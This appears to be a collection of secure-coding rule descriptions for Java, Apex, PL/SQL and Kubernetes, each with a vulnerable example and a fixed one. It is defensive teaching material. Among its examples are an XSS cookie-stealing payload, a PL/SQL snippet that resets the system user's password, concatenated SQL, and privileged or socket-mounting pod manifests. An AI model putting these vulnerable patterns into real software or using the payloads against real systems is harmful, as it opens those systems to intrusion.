import android.support.annotation.RequiresApi;

public class MyIntentBroadcast {
    @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN_MR1)
    public void broadcast(Intent intent, Context context, UserHandle user,
                          BroadcastReceiver resultReceiver, Handler scheduler, int initialCode,
                          String initialData, Bundle initialExtras,
                          String broadcastPermission) {
        context.sendBroadcast(intent); // Sensitive
        context.sendBroadcastAsUser(intent, user); // Sensitive

        // Broadcasting intent with "null" for receiverPermission
        context.sendBroadcast(intent, null); // Sensitive
        context.sendBroadcastAsUser(intent, user, null); // Sensitive
        context.sendOrderedBroadcast(intent, null); // Sensitive
        context.sendOrderedBroadcastAsUser(intent, user, null, resultReceiver,
                scheduler, initialCode, initialData, initialExtras); // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.UserHandle;
import android.support.annotation.RequiresApi;

public class MyIntentBroadcast {
    @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN_MR1)
    public void broadcast(Intent intent, Context context, UserHandle user,
                          BroadcastReceiver resultReceiver, Handler scheduler, int initialCode,
                          String initialData, Bundle initialExtras,
                          String broadcastPermission) {

        context.sendBroadcast(intent, broadcastPermission);
        context.sendBroadcastAsUser(intent, user, broadcastPermission);
        context.sendOrderedBroadcast(intent, broadcastPermission);
        context.sendOrderedBroadcastAsUser(intent, user, broadcastPermission, resultReceiver,
                scheduler, initialCode, initialData, initialExtras);
    }
}

See

java:S4036

When executing an OS command, unless you specify the full path to the executable, the directories listed in your application's PATH environment variable will be searched for the executable. That search leaves an opening for an attacker if one of the directories in PATH is under their control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by untrusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

The full path of the command is not specified and thus the executable will be searched in all directories listed in the PATH environment variable:

Runtime.getRuntime().exec("make");  // Sensitive
Runtime.getRuntime().exec(new String[]{"make"});  // Sensitive

ProcessBuilder builder = new ProcessBuilder("make");  // Sensitive
builder.command("make");  // Sensitive

Compliant Solution

The command is defined by its full path:

Runtime.getRuntime().exec("/usr/bin/make");  // Compliant
Runtime.getRuntime().exec(new String[]{"~/bin/make"});  // Compliant

ProcessBuilder builder = new ProcessBuilder("./bin/make");  // Compliant
builder.command("../bin/make");  // Compliant
builder.command(Arrays.asList("..\\bin\\make", "-j8")); // Compliant

builder = new ProcessBuilder(Arrays.asList(".\\make"));  // Compliant
builder.command(Arrays.asList("C:\\bin\\make", "-j8"));  // Compliant
builder.command(Arrays.asList("\\\\SERVER\\bin\\make"));  // Compliant

See

java:S5247

To reduce the risk of cross-site scripting attacks, templating systems, such as Twig, Django, Smarty, and Groovy's template engine, allow configuring automatic variable escaping before rendering templates. When escaping occurs, characters that are meaningful to the browser (e.g. <a>) are transformed/replaced with escaped/sanitized values (e.g. &lt;a&gt;).

Auto-escaping is not a magic feature that annihilates all cross-site scripting attacks; its effectiveness depends on the strategy applied and the context. For example, an "HTML auto-escaping" strategy (which only transforms HTML characters into HTML entities) is not sufficient when variables are used in an HTML attribute, because the ':' character is not escaped and an attack like the one below is possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

With JMustache by samskivert:

Mustache.compiler().escapeHTML(false).compile(template).execute(context); // Sensitive
Mustache.compiler().withEscaper(Escapers.NONE).compile(template).execute(context); // Sensitive

With Freemarker:

freemarker.template.Configuration configuration = new freemarker.template.Configuration();
configuration.setAutoEscapingPolicy(DISABLE_AUTO_ESCAPING_POLICY); // Sensitive

Compliant Solution

With JMustache by samskivert:

Mustache.compiler().compile(template).execute(context); // Compliant, auto-escaping is enabled by default
Mustache.compiler().escapeHTML(true).compile(template).execute(context); // Compliant

With Freemarker. See "setAutoEscapingPolicy" documentation for more details.

freemarker.template.Configuration configuration = new freemarker.template.Configuration();
configuration.setAutoEscapingPolicy(ENABLE_IF_DEFAULT_AUTO_ESCAPING_POLICY); // Compliant

See

java:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

The same-origin policy in browsers prevents, by default and for security reasons, a JavaScript frontend from performing a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in its response, called CORS headers, that act as directives for the browser and change the access control policy / relax the same-origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

Java servlet framework:

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    resp.setHeader("Content-Type", "text/plain; charset=utf-8");
    resp.setHeader("Access-Control-Allow-Origin", "*"); // Sensitive
    resp.setHeader("Access-Control-Allow-Credentials", "true");
    resp.setHeader("Access-Control-Allow-Methods", "GET");
    resp.getWriter().write("response");
}

Spring MVC framework:

@CrossOrigin // Sensitive
@RequestMapping("")
public class TestController {
    public String home(ModelMap model) {
        model.addAttribute("message", "ok ");
        return "view";
    }
}
CorsConfiguration config = new CorsConfiguration();
config.addAllowedOrigin("*"); // Sensitive
config.applyPermitDefaultValues(); // Sensitive
class Insecure implements WebMvcConfigurer {
  @Override
  public void addCorsMappings(CorsRegistry registry) {
    registry.addMapping("/**")
      .allowedOrigins("*"); // Sensitive
  }
}

User-controlled origin:

public ResponseEntity<String> userControlledOrigin(@RequestHeader("Origin") String origin) {
  HttpHeaders responseHeaders = new HttpHeaders();
  responseHeaders.add("Access-Control-Allow-Origin", origin); // Sensitive

  return new ResponseEntity<>("content", responseHeaders, HttpStatus.CREATED);
}

Compliant Solution

Java Servlet framework:

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    resp.setHeader("Content-Type", "text/plain; charset=utf-8");
    resp.setHeader("Access-Control-Allow-Origin", "trustedwebsite.com"); // Compliant
    resp.setHeader("Access-Control-Allow-Credentials", "true");
    resp.setHeader("Access-Control-Allow-Methods", "GET");
    resp.getWriter().write("response");
}

Spring MVC framework:

@CrossOrigin("trustedwebsite.com") // Compliant
@RequestMapping("")
public class TestController {
    public String home(ModelMap model) {
        model.addAttribute("message", "ok ");
        return "view";
    }
}
CorsConfiguration config = new CorsConfiguration();
config.addAllowedOrigin("http://domain2.com"); // Compliant
class Safe implements WebMvcConfigurer {
  @Override
  public void addCorsMappings(CorsRegistry registry) {
    registry.addMapping("/**")
      .allowedOrigins("safe.com"); // Compliant
  }
}

User-controlled origin validated with an allow-list:

public ResponseEntity<String> userControlledOrigin(@RequestHeader("Origin") String origin) {
  HttpHeaders responseHeaders = new HttpHeaders();
  if (trustedOrigins.contains(origin)) {
    responseHeaders.add("Access-Control-Allow-Origin", origin);
  }

  return new ResponseEntity<>("content", responseHeaders, HttpStatus.CREATED);
}

See

java:S2092

When a cookie is protected with the secure attribute set to true, it will not be sent by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is, for instance, a session cookie not designed to be sent over non-HTTPS communication.
  • it is unclear whether the website contains mixed content (i.e. whether HTTPS is used everywhere).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPS everywhere, so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

If you create a security-sensitive cookie in your Java code:

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setSecure(false);  // Sensitive: a security-sensitive cookie is created with the secure flag set to false

By default the secure flag is set to false:

Cookie c = new Cookie(COOKIENAME, sensitivedata);  // Sensitive: a security-sensitive cookie is created with the secure flag not defined (by default set to false)

Compliant Solution

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setSecure(true); // Compliant: the sensitive cookie will not be sent during an unencrypted HTTP request thanks to the secure flag set to true

See

apex:S5377

Why is this an issue?

By default Apex code executes without checking permissions. Hence the code will not enforce field level security, sharing rules and user permissions during execution of Apex code in Triggers, Classes and Controllers. This creates the risk that unauthorized users may get access to sensitive data records or fields.

To prevent this, developers should use the with sharing keyword when declaring their classes if the class contains SOQL or SOSL queries or DML statements. This ensures that the current user’s permissions, field level security, and sharing rules are enforced during code execution. Thus users will only see or modify records and fields to which they have access.

Use without sharing when a specific class should have full access to records without taking into account current user’s permissions. This should be used very carefully.

Use inherited sharing when the code should inherit the level of access from the calling class. This is more secure than not specifying a sharing level as the default will be equivalent to "with sharing".

This rule raises an issue when a class containing DML, SOSL or SOQL queries has no sharing level specified (with sharing, without sharing, inherited sharing).

Noncompliant code example

public class MyClass { // Noncompliant, no sharing specified
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id FROM Case WHERE Status = 'In Progress']){ // SOQL query
      // ...
  }
}

public class MyClass { // Noncompliant
  List<List<SObject>> sList = [FIND 'TEST' IN ALL FIELDS
                                      RETURNING Case(Name), Contact(FirstName,LastName)]; // SOSL query

}

public class MyClass { // Noncompliant
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id, Status FROM Case WHERE Status = 'In Progress']){
      c.Status = 'Closed';
      lstCasesToBeUpdated.add(c);
  }
  Update lstCasesToBeUpdated;  // DML query
}

Compliant solution

public with sharing class MyClass {
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id FROM Case WHERE Status = 'In Progress']){
      // ...
  }
}

public without sharing class MyClass {
  List<List<SObject>> sList = [FIND 'TEST' IN ALL FIELDS
                                      RETURNING Case(Name), Contact(FirstName,LastName)];
}

public inherited sharing class MyClass {
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id, Status FROM Case WHERE Status = 'In Progress']){
      c.Status = 'Closed';
      lstCasesToBeUpdated.add(c);
  }
  Update lstCasesToBeUpdated;
}

Exceptions

No issue will be raised for test classes, i.e. classes annotated with @isTest

Resources

apex:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

String password = 'xxxx'; // Sensitive

Compliant Solution

String password = retrievePassword();

See

apex:S5378

By default Apex code executes without checking permissions. Hence the code will not enforce field level security, sharing rules and user permissions during execution of Apex code in Triggers, Classes and Controllers. This creates the risk that unauthorized users may get access to sensitive data records or fields.

It is possible to specify different level of sharing via the keywords "with sharing", "without sharing" or "inherited sharing". The last two should be used very carefully as they can create security risks.

This rule raises an issue whenever a DML, SOSL or SOQL query is executed in a class marked as without sharing or inherited sharing.

Ask Yourself Whether

  • this code gives access to or modifies restricted records.
  • this code may be executed by users who shouldn’t have access to those records.
  • if the class is marked as inherited sharing, it may be called by a class marked as without sharing.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use with sharing whenever possible.
  • Use without sharing only after checking that the code is not accessible to unauthorized users.
  • Use inherited sharing only when all calling without sharing classes are safe.

Sensitive Code Example

public without sharing class MyClass {
  List<List<SObject>> sList = [FIND 'TEST' IN ALL FIELDS
                                      RETURNING Case(Name), Contact(FirstName,LastName)]; // Sensitive
}

public inherited sharing class MyClass {
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id, Status FROM Case WHERE Status = 'In Progress']){ // Sensitive
      c.Status = 'Closed';
      lstCasesToBeUpdated.add(c);
  }
  Update lstCasesToBeUpdated; // Sensitive
}

Compliant Solution

public with sharing class MyClass { // Compliant
  List<Case> lstCases = new List<Case>();
  for(Case c:[SELECT Id FROM Case WHERE Status = 'In Progress']){
      // ...
  }
}

See

apex:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It invites using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but in the case of a hardcoded IP address, fixing the issue will take more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • It can give an attacker information about the network topology.
  • It is a personal IP address (assigned to an identifiable person).

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

String ip = '192.168.12.42'; // Sensitive
String clientIp = ApexPages.currentPage().getHeaders().get('True-Client-IP');
Boolean isKnown = ip.equals(clientIp);

Compliant Solution

StaticResource sr = [SELECT Body FROM StaticResource WHERE Name = 'configuration' LIMIT 1]; // Compliant
String ipAddress = sr.Body.toString();
String clientIp = ApexPages.currentPage().getHeaders().get('True-Client-IP');
Boolean isKnown = ipAddress.equals(clientIp);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849
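The exception ranges above can be checked programmatically. As an illustrative sketch (not part of the rule itself), Python's standard `ipaddress` module makes the membership tests explicit:

```python
import ipaddress

# Ranges the rule treats as non-sensitive documentation addresses
# (RFC 5737 for IPv4, RFC 3849 for IPv6).
DOCUMENTATION_RANGES = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("2001:db8::/32"),
]

def is_documentation_address(addr: str) -> bool:
    """Return True if addr falls in a range reserved for documentation."""
    ip = ipaddress.ip_address(addr)
    # Membership is automatically False when the IP versions differ.
    return any(ip in net for net in DOCUMENTATION_RANGES)

print(is_documentation_address("192.0.2.1"))  # documentation range → True
print(is_documentation_address("8.8.8.8"))    # routable address → False
```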

See

plsql:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as the originally hashed value. This also applies to the other message-digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, and HMACRIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

DBMS_CRYPTO.Hash(str, DBMS_CRYPTO.HASH_MD4);

DBMS_CRYPTO.Hash(str, DBMS_CRYPTO.HASH_MD5);

DBMS_CRYPTO.Hash(str, DBMS_CRYPTO.HASH_SH1);

Resources

plsql:SysOwnedFunctions

Why is this an issue?

Some Oracle packages contain powerful SYS-owned functions that can be used to perform malicious operations. For instance, DBMS_SYS_SQL.PARSE_AS_USER can be used to execute a statement as another user.

Most programs do not need those functions, and this rule helps identify their use in order to prevent security risks.

Noncompliant code example

DECLARE
  c INTEGER;
  sqltext VARCHAR2(100) := 'ALTER USER system IDENTIFIED BY hacker'; -- Might be injected by the user
BEGIN
  c := SYS.DBMS_SYS_SQL.OPEN_CURSOR();                               -- Noncompliant

   -- Will change 'system' user's password to 'hacker'
  SYS.DBMS_SYS_SQL.PARSE_AS_USER(c, sqltext, DBMS_SQL.NATIVE, UID);  -- Noncompliant

  SYS.DBMS_SYS_SQL.CLOSE_CURSOR(c);                                  -- Noncompliant
END;
/

Resources

plsql:S1523

Executing code dynamically is security-sensitive and has led to vulnerabilities in the past.

Any code which is dynamically evaluated in your process will have the same permissions as the rest of your code. Thus it is very dangerous to do so with code coming from an untrusted source. Injected code can run either on the server or in the client (for example, in an XSS attack).

EXECUTE IMMEDIATE executes as a dynamic SQL statement or anonymous PL/SQL block the string passed as an argument. It’s safe only if the argument is composed of constant character string expressions. But if the command string is dynamically built using external parameters, then it is considered very dangerous because executing a random string allows the execution of arbitrary code.

This rule marks for review each occurrence of dynamic code execution.

Ask Yourself Whether

  • The executed code may come from an untrusted source and hasn’t been sanitized.
  • You really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The best solution is to not run code provided by an untrusted source. If you really need to build a command string using external parameters, you should use EXECUTE IMMEDIATE with bind variables instead.

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Sensitive Code Example

CREATE OR REPLACE PROCEDURE ckpwd (p_user IN VARCHAR2, p_pass IN VARCHAR2)
IS
 v_query  VARCHAR2(100);
 v_output NUMBER;
BEGIN
 v_query :=    q'{SELECT COUNT(*) FROM user_pwd }'
         ||    q'{WHERE username = '}'
         ||    p_user
         ||    q'{' AND password = '}'
         ||    p_pass
         ||    q'{'}';
 EXECUTE IMMEDIATE v_query
  INTO v_output;
END;

Compliant Solution

CREATE OR REPLACE PROCEDURE ckpwd_bind (p_user IN VARCHAR2, p_pass IN VARCHAR2)
IS
 v_query  VARCHAR2(100);
 v_output NUMBER;
BEGIN
 v_query :=
   q'{SELECT COUNT(*) FROM user_pwd WHERE username = :1 AND password = :2}';
 EXECUTE IMMEDIATE v_query
  INTO v_output
  USING p_user, p_pass;
END;

See

plsql:S2278

This rule is deprecated; use S5547 instead.

Why is this an issue?

According to the US National Institute of Standards and Technology (NIST), the Data Encryption Standard (DES) is no longer considered secure:

Adopted in 1977 for federal agencies to use in protecting sensitive, unclassified information, the DES is being withdrawn because it no longer provides the security that is needed to protect federal government information.

Federal agencies are encouraged to use the Advanced Encryption Standard, a faster and stronger algorithm approved as FIPS 197 in 2001.

For similar reasons, RC2 should also be avoided.

Noncompliant code example

encryption_type PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_DES
                             + DBMS_CRYPTO.CHAIN_CBC
                             + DBMS_CRYPTO.PAD_PKCS5;

Compliant solution

encryption_type PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_AES256
                             + DBMS_CRYPTO.CHAIN_CBC
                             + DBMS_CRYPTO.PAD_PKCS5;

Resources

plsql:S5547

Why is this an issue?

Strong cipher algorithms are cryptographic systems resistant to cryptanalysis; they are not vulnerable to well-known attacks such as brute-force attacks.

A general recommendation is to only use cipher algorithms that have been intensively tested and are promoted by the cryptographic community.

More specifically for block ciphers, it is not recommended to use an algorithm with a block size smaller than 128 bits.

Noncompliant code example

encryption_type PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_DES
                             + DBMS_CRYPTO.CHAIN_CBC
                             + DBMS_CRYPTO.PAD_PKCS5;

Compliant solution

encryption_type PLS_INTEGER := DBMS_CRYPTO.ENCRYPT_AES256
                             + DBMS_CRYPTO.CHAIN_CBC
                             + DBMS_CRYPTO.PAD_PKCS5;

Resources

plsql:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset a password, etc.).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, or SHA-3, are recommended. For password hashing, it is even better to use algorithms that deliberately compute slowly, such as bcrypt, scrypt, argon2, or pbkdf2, because this slows down brute-force attacks.
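Although this rule targets PL/SQL, the recommendation can be sketched with Python's standard library (an illustrative example, not taken from the rule): SHA-256 for integrity digests, and the deliberately slow PBKDF2 key-derivation function for password hashing.

```python
import hashlib
import os

# Integrity digest: SHA-256 instead of MD5/SHA-1.
digest = hashlib.sha256(b"message to protect").hexdigest()

# Password hashing: a slow key-derivation function resists brute force.
# (bcrypt/scrypt/argon2 need extra packages; PBKDF2 ships with Python.)
salt = os.urandom(16)            # unique random salt per password
derived = hashlib.pbkdf2_hmac(
    "sha256",                    # underlying hash function
    b"user password",            # secret to protect
    salt,
    600_000,                     # iteration count tunes the work factor
)
```

Only the salt and the derived key are stored; verification reruns `pbkdf2_hmac` with the stored salt and compares the results.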

See

kubernetes:S6428

Running containers in privileged mode can reduce the resilience of a cluster in the event of a security incident because it weakens the isolation between hosts and containers.

Process permissions in privileged containers are essentially the same as root permissions on the host. If these processes are not protected by robust security measures, an attacker who compromises a root process on a Pod’s host is likely to gain the ability to pivot within the cluster.
Depending on how resilient the cluster is, attackers can extend their attack to the cluster by compromising the nodes from which the cluster launched the process.

Ask Yourself Whether

  • The services of this Pod are accessible to people who are not administrators of the Kubernetes cluster.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Disable privileged mode.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        privileged: true # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        privileged: false

See

kubernetes:S6433

Mounting sensitive file system paths can lead to information disclosure and compromise of the host systems.

System paths can contain sensitive information like configuration files or cache files. Those might be used by attackers to expand permissions or to collect information for further attacks. System paths can also contain binaries and scripts that might be executed by the host system periodically. A compromised or rogue container with access to sensitive files could endanger the integrity of the whole Kubernetes cluster.

Ask Yourself Whether

  • The mounted file path contains sensitive information.
  • The mounted file path contains configuration files or executables that are writable.
  • The Pod is untrusted or might contain vulnerabilities.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to avoid mounting sensitive system file paths into containers. If such a mount is required by the architecture, apply the principle of least privilege, for instance by making the mount read-only to prevent unwanted modifications.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    volumeMounts:
    - mountPath: /data
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /etc # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    volumeMounts:
    - mountPath: /data
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /mnt/nfs

See

kubernetes:S6431

Using host operating system namespaces can lead to compromise of the host systems.
These attacks would target:

  • host processes
  • host inter-process communication (IPC) mechanisms
  • network services of the local host system

These three items likely include systems that support either the internal operation of the Kubernetes cluster or the enterprise’s internal infrastructure.

Opening these points to containers opens new attack surfaces for attackers who have already successfully exploited services exposed by containers. Depending on how resilient the cluster is, attackers can extend their attack to the cluster by compromising the nodes from which the cluster started the process.

Host network sharing could provide a significant performance advantage for workloads that require critical network performance. However, the successful exploitation of this attack vector could have a catastrophic impact on confidentiality within the cluster.

Ask Yourself Whether

  • The services of this Pod are accessible to people who are not administrators of the Kubernetes cluster.
  • The performance of the cluster’s services does not rely on host operating system namespaces.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not use host operating system namespaces.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
  hostPID: true     # Sensitive
  hostIPC: true     # Sensitive
  hostNetwork: true # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
  hostPID: false
  hostIPC: false
  hostNetwork: false

See

kubernetes:S6430

Allowing process privilege escalations exposes the Pod to attacks that exploit setuid binaries.

This field directly controls whether the no_new_privs flag is set in the container process.
When this flag is enabled, binaries configured with setuid or setgid bits cannot change their runtime uid or gid: potential attackers must rely on other privilege escalation techniques to successfully operate as root on the Pod.

Depending on how resilient the Kubernetes cluster and Pods are, attackers can extend their attack to the cluster by compromising the nodes from which the cluster started the Pod.

The allowPrivilegeEscalation field should not be set to true unless the Pod’s risks related to setuid or setgid bits have been mitigated.

Ask Yourself Whether

  • This Pod is accessible to people who are not administrators of the Kubernetes cluster.
  • This Pod contains binaries with setuid or setgid capabilities.

There is a risk if you answered yes to all of these questions.

Recommended Secure Coding Practices

Disable privilege escalation.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        allowPrivilegeEscalation: true # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
    - name: web
      image: nginx
      ports:
        - name: web
          containerPort: 80
          protocol: TCP
      securityContext:
        allowPrivilegeEscalation: false

See

kubernetes:S6429

Exposing Docker sockets can lead to compromise of the host systems.

The Docker daemon provides an API to access its functionality, for example through a UNIX domain socket. Mounting the Docker socket into a container allows the container to control the Docker daemon of the host system, resulting in full access over the whole system. A compromised or rogue container with access to the Docker socket could endanger the integrity of the whole Kubernetes cluster.

Ask Yourself Whether

  • The Pod is untrusted or might contain vulnerabilities.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended never to mount the Docker socket as a volume into a Pod.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /var/run/docker.sock # Sensitive
      type: Socket

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container

See

kubernetes:S5849

Setting capabilities can lead to privilege escalation and container escapes.

Linux capabilities allow you to assign narrow slices of root's permissions to processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring additional root privileges.

In a container, capabilities might allow access to resources of the host system, which can result in container escapes. For example, with the SYS_ADMIN capability, an attacker might be able to mount devices from the host system inside the container.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all of the granted capabilities to do its job.
  • To an untrusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with the superuser (root), so make sure that only the most restrictive set of necessary capabilities is assigned.

Sensitive Code Example

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container
    securityContext:
      capabilities:
        add: ["SYS_ADMIN"] # Sensitive

Compliant Solution

apiVersion: v1
kind: Pod
metadata:
  name: example
spec:
  containers:
  - image: k8s.gcr.io/test-webserver
    name: test-container

See